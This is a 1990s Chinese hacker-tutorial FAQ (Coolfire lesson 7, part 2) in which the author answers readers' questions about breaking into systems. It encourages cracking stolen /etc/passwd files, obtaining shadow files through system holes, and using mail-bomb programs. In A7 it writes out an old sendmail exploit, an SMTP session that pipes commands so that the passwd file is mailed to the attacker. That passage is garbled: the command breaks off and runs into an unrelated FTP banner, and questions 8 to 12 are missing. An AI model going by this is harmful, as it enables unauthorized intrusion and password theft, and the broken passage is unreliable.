coolfire黑客入门教学文章七(下)

有很多网友在传档案的时候都会发生这种状况, 由於我的 ISP 日前将 DNS Server 及
Http Server 作了一些调整, 有些档案好像没有搬好的样子, 目录底下遗失了一些档案
自然各位也就没有办法抓到了, 不过有很多档案可以在 File Mirror Site 抓到, 目前
我们有热心的网友提供了 ftp.cads.com.tw/pub/security 这个位址供本站 Mirror 一
些档案, 我也将一些较大, 大家比较不容易抓下来的档案都放了一份在上面, 所以不管
是甚么档案, 如果有抓不下来, 或是系统告诉你有连结错误的, 你都可以到这个 FTP
抓取, 不过该主机对 Anonymous 设限, 一次最多只能有 5 的使用者同时上线抓档, 如
果有连不上的, 就请你找个比较不塞车的时间再上去抓抓看! 我们没有办法提供 E-Mail 送档的服务, 虽然之前有帮几位网友送档, 但是现在有了 ftp 让各位自己抓取, 我们也 就不浪费网路的频宽及时间了.
[Q4]
我已经申请了cyberspace的帐号,请问要从那一个画面连上cyberspace,然後再去crack?
如果我用ftp or telnet进入了系统,那我的IP位址和我所做的任何动作会不会在那里留
下任何线索?
[A4]
我想你们都误会了我的意思, 不是说你 Login 进入 Cyberspace 再 Login 到别的站台
别人就只会查到你在 Cyberspace 的帐号, 事实上当你 Login 进 Cyberspace 时, 也已经暴露了你目前的 IP, 因为你 Login 的时候 Cyberspace 也会询问你的 IP.
[Q5]
1.你的站为什么关了?
2.I can’t download Cracker Jack,KOS and other files,why?
This is the error message when I download “Cracker Jack 1.4”:
Error 404
Not found – file doesn’t exist or is read protected even tried multi
CERN httpd 3.0
3.When i join your Homepag, i receive the error:
HTTP/1.0 404 Object Not Found .
What has happend?
[A5]
那一阵子由於我的 ISP 这边传输的状况并不是很好, 所以有很多人可能连上来的时候找
不到东西了, 这个问题也一直困扰我很久, 但是也是没有办法真正的彻底解决, 所以如
果有这种状况的话, 请大家写信通知我一下, 如果是迁移到其它的 Web 站去, 或是暂时
停止服务的话, 我们也会在上面作一些说明, 不会有让大家找不到的情况发生的!
[Q6]
Sorry to bother you again,because I thought the “John the Ripper”. can help me
find out the register code which I want;however,can you hepl me to find out
the register code for the software “Xing MPEG Player 32-Bit 3012 Trial”,which
I down loaded from ……
[A6]
居然有人会来找我问软体注册码的问题, 我可没有办法回答, 这不是我的专业, 当然破解
站台也不是我的专业, 所以如果有此类的问题的话, 请各位到 alt.hacker 论坛去发问,
或是在国内找找其它提供注册码的站台, 我没有办法帮你耶….:(
[Q7]
你知道吗?news上俞煌男有写一个程式是sendmail 收到password to you know?你是否也
有同样的program?and letmein 2.0不知进展如何?
[A7]
呵呵~~ Know How 是不是?? 其实要看他写出来的东西是针对哪个 Sendmail 版本啦, 像
很多版本的 Sendmail 都有被人家抓出一些 Bug 出来, 那也要看这个 Bug 的危险性到
甚么程度,一般这些东西都会有人整理出来, 但是如果 Mail Server 使用的刚好不是
Bug 有列出来的话, 你可能也没有办法了吧?? 我举一个很久以前在 Bugtraq 上面看到
的 sendmail bug 来作说明好了, 这个 Bug 的版本我忘了, 好像是 sendmail 5.6 的吧
(很久了), 现在不晓得还有没有人在用这个版本, 如果有的话, 就算他倒霉好了! 是这
样的, 这个版本的 Sendmail 可以让人执行一些指令, 所以我们可以利用这个漏洞把
passwd 档寄给自己, 而连到 smtp 就可以控制 sendmail 来发信了!
telnet xxx.xxx.xxx 25
helo MyDear
mail from: “|/bin/mail [email protected] ftp ftp.xxxxxxxxx.xxx.tw
Connected to ftp.xxxxxxxxx.xxx.tw.
220-Serv-U FTP-Server v2.2 for WinSock ready…
220-Welcome to xxxxxxxxxxxx xxx Ftp Server(ftp.xxxxxxxxx.xxx.tw).
220-From xxx.xx.xxx.xx
[Q13]
请问你能否告诉我如何制造mail bomb,因为最近老是收到广告信或者有的没有的,实在很 讨厌. [A13]
首页上有一堆Mail Bomb 的程式, 你需要的只是把他们抓下来, 然後在电脑上跑就行了, 当然里面也都有说明档之类的文件. 在收到广告信件的时候, 请不要一昧的回信, 因为 有些发 MailList 的人, 对系统的运作并不 解, 有时可能是利用在帐号目录设 .foward 的方式来发信的, 而信件中的 Reply to: 栏位填的也是该帐号, 当遇到这种情况的时候, 你所发的信会让所有在这个 MailList 的人都收到, 如果所有的收件人都回这封信的话, 那你的信箱一定就爆烂了! 所以要先冷静的分析一下这封信的发法, 会不会伤害到别人, 再决定要怎么办, 千万别乱炸!~ MailBomb 也会害到自己的, 切记~
[Q14]
您好!我是XXXXXXXXXXXXXXXXX!!对於您写的TXT2DIC 有一点问题!为什么所建的密
码档PASSDICT不会增加!只是每增加一次字典,PASSDICT会随著不同!
[A14]
TXT2DIC 的产生方式会覆盖掉旧有的档案, 所以请在使用的时候使用不同的档案名称,
目前最新的 TXT2DIC V1.2 也还没有使用 File Append 的方式, 所以仍然会将旧档案覆 盖, 若你不想覆盖旧档, 请使用不同的档名来进行转换! 否则程式将不会给你任何的警 告就把档案盖下去了!
[Q15]
在网路闲逛时发现FETAG Software’s Hacking Page像发现宝一样的下载了Coolhc#1-6,
在以前电影、小说所描述的骇客情节,以为只有在外国才有的事,想不到在台湾已有人
在这片领域默默的耕耘,虽然我不是很聪明但还是很有兴趣的想出点力。拜读你的大作
似乎有点意犹未尽,想请教你什么时候再出第七集,坊间有什么中文的入门书可参考的
。还有想当一个骇客族会不会很难。
[A15]
谢谢你的鼓励, 7 跟 6 之间的确是隔了很久, 且这一篇也没有讲到甚么东西, 有点对不 起大家的等待了. 若想要学入侵, 希望各位能多看一看 Unix 方面的书, 先将 Unix 的指 令读熟, 最基本的当然就是 Shell 指令, 再来就是学著写一些简单的 Shell Script, 若没有馀力自己找系统的漏洞, 又想要破解站台, 建议要多看看一些系统安全的 Mail List, (好多老话重谈), 这一篇就针对 Mail List 的部份, 有简单的介绍, 让大家对这 些系统安全的 Mail List 有些 解, 进而多吸收一些知识.
[Q16]
我想请问一下,我是用Browser抓/etc/passwd的, 面root的密码是被编过码的吗?
我用Crack Jack 1.4解码。但是好像不行,到底要用什么解才对,一下用Crack Jack,一 下又用Brute,我都看不懂,还有就是UltraEdit是什么?Pass2Dic有用吗?还有我用 NetTerm 4.1版for win31可是ftp or sendmail好像都进不去,是什么原因呢?另外就是 我用CuteFtp 1.8版,Login设anonymous or Double,ID和passwd都空白,但是为什么就 可以进Ftp,然後用NetTerm却进不去? 还有KOS(1.?M)的不会用。
[A16]
好多问题喔~ 我一一的简短回答:[1]要看 Passwd 是否是编码过的, 在 CoolHC#1 中就有 说明, 我没有亲眼看到 passwd 档, 没有办法回答. [2]CrackJack 跟 Brute 都是功能相 同的程式, CrackJack 速度比较快, 请你先看一下 CoolHC1~6 之後再发问, 因为有很多 东西都是写过的了! [3]UltraEdit??? 文书编辑程式, 我用它来写 Home Page [4]Pass2Dic
在 CJack 上已经有选项了, 但是在 Brute 之类的成式上就用得到. [5]ftp 有提供匿名 登入, 但是在 Telnet 没有, 所以无法登入. [6] KOS 的用法也写过了!
[Q17]
when i use txt2dic.exe , i can’t use it first, when i go into the third step
it show ” incorrect dos version….done!” secondly, when i gp into the fourth step , it show” have some error on code-62 “what’s wrong ?
[A17]
第一个问题, 在第三步骤发生 Incorrect dos version, 你用的是 1.0 版, 所以需要呼 叫到 dos 的 sort 程式, 请使用 1.2 版 (For Win32 only) 就不会有此状况了! 二,你 发生 Error 62 的状况, 这在上一次的 FAQ 中也有讲过了, 请去翻一翻就 解了! 不过 这个状况也在 1.2 版改进了, 所以建议还是用新的版本, 就不会有这种状况发生了!
[Q18]
When I get a passwd file which is shadowed….Please tell me how to do….
[A18]
如果我跟你讲, 无解呢?? 有些 shadow 过的档, 只要你有办法抓到另外一个 shadow 档 是有办法解开的, 但是单要使用 shadow 过的档, 我不相信有人能够解开~ 所以还是要抓 到另一个来 “配对” 才有用! 至於如何抓到 shadow? 很多人都有这样的问题, 那就要看 系统 “提供” 的漏洞多不多了, 不然它 shadow 也就没有意义罗!
[Q19]
First of all, I’d like to give you some feedbacks about your page.
I’m not in Vancouver. I always encounter the slow transfer rate with many
Taiwanese sites. I only got 30 bytes/sec with your site. I don’t know the
reason… Anyway, you are the first Chinese hacking page I’ve ever seen.
I like that. I just want to learn more. Could yu give me some Chinese hacking
pages’ addresses? I will be glad to visit them. By the way, I’m not interseted
in emailbombs, because they hurt others. But I’m interested in defensing and
cracking emailbombs. I hope you can update your page oftenly. Thanks a lot!
[A19]
谢谢你, 我们会尽量的更新我们的网页, 至於其它中文的类似站台??? 呜… 你们在哪
里呀?? 快点现身吧!! 如果大家有找到新的类似站台的话, 寄得赶快写信来告诉我呦~
[Q20]
请问我ISP的OS是SunOS5.4,我用贵站上的方法不好用了,用贵站关于shadow的link上提 到的也不成了,要如何取得其shadow过的passwd呢?请赐教,多谢!
[A20]
喔~~ 对了! 刚才忘了讲, 如果各位已经试过几个 Port, 解自己系统的版本编号, 使用
的 Sendmail 版本, ftp 版本等的话, 你们可以到 http://underground.org 去看看, 点 选左边那个 Bugs, 然後选一下你所知道的系统, 他会列出一些目前所知的 Bugs 出来, 然 候你就可以依样画葫芦啦, 不过那些讯息都是英文的啦~~